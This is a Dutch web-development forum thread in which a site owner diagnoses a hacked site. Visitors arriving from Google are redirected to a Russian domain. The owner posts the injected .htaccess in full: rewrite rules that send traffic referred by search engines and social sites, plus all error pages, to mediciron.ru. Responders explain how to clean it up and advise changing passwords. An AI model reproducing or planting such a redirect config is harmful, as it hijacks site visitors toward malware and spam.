Eigen website wordt vanaf Google verkeerd doorgelinkt - Softwareontwikkeling

dinsdag 29 januari 2013 11:45

Acties:

Verwijderd

Topicstarter

Hallo,

Ik heb problemen met één van men eerste websites die ik heb gebouwd.
Volgens mij moet er ergens een code inzitten die er niet in hoort.

Ik schets even de situatie :

Als je de website www.perledouce.be via de adresbalk ingeeft dan kom je op de site zonder enige foutmelding.

Als je de website via google ingeeft en dan klikt op link die google voorsteld (wat correct is) dan wordt je doorgestuurd naar de website van Offeemedic.com.

Heeft iemand enig idee wat het probleem zou zijn? Ik heb me al rot gezocht en vind niet direct een code die er niet in thuis hoort.

Alvast bedankt,
Met vriendelijke groet
Peter

dinsdag 29 januari 2013 11:47

Acties:

ThinkPad

Als ik hier met Google zoek op "perledouce" dan staat jouw site ergens halverwege, als ik daar op klik probeert hij naar http://mediciron.ru/ te gaan

Ik zou je site maar eens nalopen, misschien is hij gehackt en worden bezoekers daarom automatisch geredirect

[ Voor 32% gewijzigd door NMe op 29-01-2013 15:19 . Reden: Link onklikbaar gemaakt. ]

dinsdag 29 januari 2013 11:47

Acties:

webgangster

Vreemd, de eerste keer doet hij inderdaad wat jij beschrijft, de tweede keer werkt het wel goed.

dinsdag 29 januari 2013 14:04

Acties:

André

Analytics dude

Het gaat om dit plaatje: http://perledouce.be/css/images/button.png, die wordt gelinked vanuit http://perledouce.be/css/stijl.css. Dat plaatje geeft een redirect naar mediciron.ru en die weer naar offeemedic.com.

Zit er wellicht een extra regel in je .htaccess die dit veroorzaakt?

dinsdag 29 januari 2013 14:34

Acties:

Verwijderd

Topicstarter

André schreef op dinsdag 29 januari 2013 @ 14:04:
Het gaat om dit plaatje: http://perledouce.be/css/images/button.png, die wordt gelinked vanuit http://perledouce.be/css/stijl.css. Dat plaatje geeft een redirect naar mediciron.ru en die weer naar offeemedic.com.

Zit er wellicht een extra regel in je .htaccess die dit veroorzaakt?

Wel moet eerlijk zijn dat ik zelf geen .htaccess heb aangemaakt en als ik in men directory kijk zie ik ook niet direct één staan. Zou het kunnen dat het probleem bij de hostfirma zelf ligt ? Ik heb een backup terug geplaatst en nog steeds hetzelfde probleem.

Bedankt alvast om mij te melden waar het probleem zelf zit

Mvg

dinsdag 29 januari 2013 14:39

Acties:

André

Analytics dude

Maar zie je in de root, de map css of de maps images wel een .htaccess staan dan? Ik ben nog even verder in je probleem gedoken, maar het lijkt er eenvoudigweg op dat je 404 pagina de boosdoener is. Die button bestaat niet en dus krijg je de 404 pagina, en daar staat een redirect op:

http://perledouce.be/bestaatniet

dinsdag 29 januari 2013 14:57

Acties:

Verwijderd

Topicstarter

Wel ik ben heel men website aan het uitkammen en vind nergens een .htaccess file terug. Niet in men images ook niet in de root en ook niet bij de css? Kan het zijn dat met men filezilla die file niet standaard getoont wordt of is dit niet correct. Moet zeggen dat ik nog niet veel met die .htacces heb moeten werken dus bij deze mijn iets dommere vragen.

Mvg
Peter

dinsdag 29 januari 2013 15:02

Acties:

Verwijderd

Topicstarter

Ok, ik heb dus mijn .htaccess gevonden..

dit vind ik erin terug :

Options -Indexes
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*baidu.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*youtube.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*wikipedia.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*qq.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*facebook.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*twitter.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*blog.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*myspace.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*linkedin.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://mediciron.ru/ [R,L]
ErrorDocument 401 http://mediciron.ru/
ErrorDocument 403 http://mediciron.ru/
ErrorDocument 404 http://mediciron.ru/
ErrorDocument 500 http://mediciron.ru/

zoals je zei is er inderdaad een redirect naar die website. Eerst en vooral hoe kan ik het terug normaal krijgen en hoe kan ik mij ertegen beveiligen ?

Alvast bedankt!

[ Voor 1% gewijzigd door NMe op 29-01-2013 15:22 . Reden: Links onklikbaar gemaakt. ]

dinsdag 29 januari 2013 15:05

Acties:

Gitano

De .htaccess openen , leeg maken , en opslaan als leeg bestand.. dan dat lege .htaccess bestand terug uploaden..

En dan even in de gaten houden of hij niet weer gevuld gaat worden natuurlijk.

dinsdag 29 januari 2013 15:06

Acties:

Gtoniser

Behalve de eerste regel (Options -Indexes) alles verwijderen.

dinsdag 29 januari 2013 15:07

Acties:

ThinkPad

Waarmee upload je bestanden naar de website? Volgens mij zit er in de FileZilla FTP Client namelijk een lek waardoor wachtwoorden eenvoudig te onderscheppen waren

[ Voor 26% gewijzigd door ThinkPad op 29-01-2013 15:07 ]

dinsdag 29 januari 2013 15:10

Acties:

hiekikowan

Hier iemand met een vergelijkbaar probleem, en dit is inderdaad niet de eerste keer dat ik gehoord heb over een soortgelijk lek in Filezilla...

dinsdag 29 januari 2013 15:10

Acties:

soulrider

kunnen de links ook aangepast worden naar niet klikbare varianten?
nu geef je hen een extra backlink met goede reputatie: en breng je hun hoger in de zoekmachines (of GoT gaat enkele stappen naar beneden)

pas de http:// bv aan naar hxxp:// zoals enkele security-blogs doen

of kan alles tussencode-tags gezet worden? dan gebeurt er ook geen linking als ik me niet vergis

[ Voor 14% gewijzigd door soulrider op 29-01-2013 15:11 ]

dinsdag 29 januari 2013 15:23

Acties:

NMe

Quia Ego Sic Dico.

...of je zet er gewoon [norml]-tags omheen, wat ik net gedaan heb.

'E's fighting in there!' he stuttered, grabbing the captain's arm.
'All by himself?' said the captain.
'No, with everyone!' shouted Nobby, hopping from one foot to the other.

dinsdag 29 januari 2013 15:32

Acties:

Verwijderd

Topicstarter

bdalenoord schreef op dinsdag 29 januari 2013 @ 15:10:
Hier iemand met een vergelijkbaar probleem, en dit is inderdaad niet de eerste keer dat ik gehoord heb over een soortgelijk lek in Filezilla...

Welke zou je dan aanbevelen die wel betrouwbaar is ?

NMe schreef op dinsdag 29 januari 2013 @ 15:23:
...of je zet er gewoon [norml]-tags omheen, wat ik net gedaan heb.

Waar prefereer je die tags dan?

Alvast bedankt allen voor de hulp!

dinsdag 29 januari 2013 15:37

Acties:

NMe

Quia Ego Sic Dico.

Verwijderd schreef op dinsdag 29 januari 2013 @ 15:32:
Waar prefereer je die tags dan?

Om de verwijzing naar http://mediciron.ru/ (dus [norml]http://mediciron.ru/[/norml]) zodat mensen niet per ongeluk erop klikken en allerlei malware binnentrekken, en ze bovendien geen voordeel kunnen halen uit de links vanuit Tweakers naar hun toe.

'E's fighting in there!' he stuttered, grabbing the captain's arm.
'All by himself?' said the captain.
'No, with everyone!' shouted Nobby, hopping from one foot to the other.

dinsdag 29 januari 2013 15:40

Acties:

3dfx

bdalenoord schreef op dinsdag 29 januari 2013 @ 15:10:
Hier iemand met een vergelijkbaar probleem,

Daar gaat de topicstart over Filezilla-server, en niet de client toch?

En dan nog, die TS zegt later dit:

So recap, The leak is not in FileZilla, it is not on the server but it is on one of the clients that has ever used that account.

Desalniettemin is het "niet optimaal" dat Filezilla-client de passwords onversleuteld opslaat

dinsdag 29 januari 2013 17:29

Acties:

BeefHazard

NMe schreef op dinsdag 29 januari 2013 @ 15:37:
[...]

Om de verwijzing naar http://mediciron.ru/ (dus [norml]http://mediciron.ru/[/norml]) zodat mensen niet per ongeluk erop klikken en allerlei malware binnentrekken, en ze bovendien geen voordeel kunnen halen uit de links vanuit Tweakers naar hun toe.

En ik helemaal DM's sturen... Grapjas.

code:

1	[url=http://spammerdespam.nl,"Hee, ik let wel op hoor. :P"]http://mediciron.ru/[/]

dinsdag 29 januari 2013 17:34

Acties:

Verwijderd

Topicstarter

Probleem is opgelost door mijn .htaccess bestand aan te passen. Nu werkt het terug perfect!

Bedankt allemaal voor de hulp!

dinsdag 29 januari 2013 17:34

Acties:

MueR

Admin Devschuur® & Discord

is niet lief

Ach, we hebben er smakelijk om gelachen BeefHazard

Verwijderd schreef op dinsdag 29 januari 2013 @ 17:34:
Probleem is opgelost door mijn .htaccess bestand aan te passen. Nu werkt het terug perfect!

Bedankt allemaal voor de hulp!

Heb je ook een ander wachtwoord op je FTP gezet? Anders is het natuurlijk zo weer raak.

[ Voor 75% gewijzigd door MueR op 29-01-2013 17:35 ]

Anyone who gets in between me and my morning coffee should be insecure.

dinsdag 29 januari 2013 17:37

Acties:

NMe

Quia Ego Sic Dico.

Verwijderd schreef op dinsdag 29 januari 2013 @ 17:34:
Probleem is opgelost door mijn .htaccess bestand aan te passen. Nu werkt het terug perfect!

Bedankt allemaal voor de hulp!

Nee, je symptoom is opgelost. Je probleem is een exploit (in je site, op een van de betrokken stukjes serversoftware, ergens anders) die het nog steeds mogelijk maakt om die .htaccessfile terug te zetten. Hij is er in de eerste instantie niet vanzelf op gekomen natuurlijk.

Ik zou als ik jou was even doorgaan met graven, eventueel je host vragen om hulp m.b.t. logfiles.

MueR schreef op dinsdag 29 januari 2013 @ 17:34:
Ach, we hebben er smakelijk om gelachen BeefHazard

[ Voor 12% gewijzigd door NMe op 29-01-2013 17:38 ]

'E's fighting in there!' he stuttered, grabbing the captain's arm.
'All by himself?' said the captain.
'No, with everyone!' shouted Nobby, hopping from one foot to the other.

dinsdag 29 januari 2013 17:46

Acties:

Verwijderd

Topicstarter

Ja tuurlijk, maar misschien maar even beginnen met hetgeen ik nu heb gedaan en dat is men wachtwoord veranderen. Het is namelijk al de 2e keer dat ik problemen heb met aanpassingen die niet gewild zijn. Vorige keer zat er een script tussen men afsluiting van men head en men body. Ik moet wel nageven dat ik het wachtwoord toen niet heb veranderd

Bij deze nu wel gedaan en we zien als het probleem terugkomt anders neem ik even contact op met de hosting firma en intussen hou ik me vanavond nog even bezig met verder uit te controleren of er nog ergens foutieve codes aanwezig zijn.

woensdag 30 januari 2013 08:42

Acties:

Orion84

Admin General Chat / Wonen & Mobiliteit

Fotogenie(k)?

Check ook vooral even de machines waarmee je de afgelopen tijd het beheer hebt uitgevoerd. Er is namelijk een serieuze kans dat die zaken vanaf een besmette PC zijn meegelift bij het reguliere bijwerken van je site. Of dat het FTP wachtwoord via een besmette PC is uitgelekt.

Een grondige virusscan van die PC('s) kan zeker geen kwaad.

[ Voor 9% gewijzigd door Orion84 op 30-01-2013 08:43 ]

The problem with common sense is that it's not all that common. | LinkedIn | Flickr

Pagina: 1

Reageer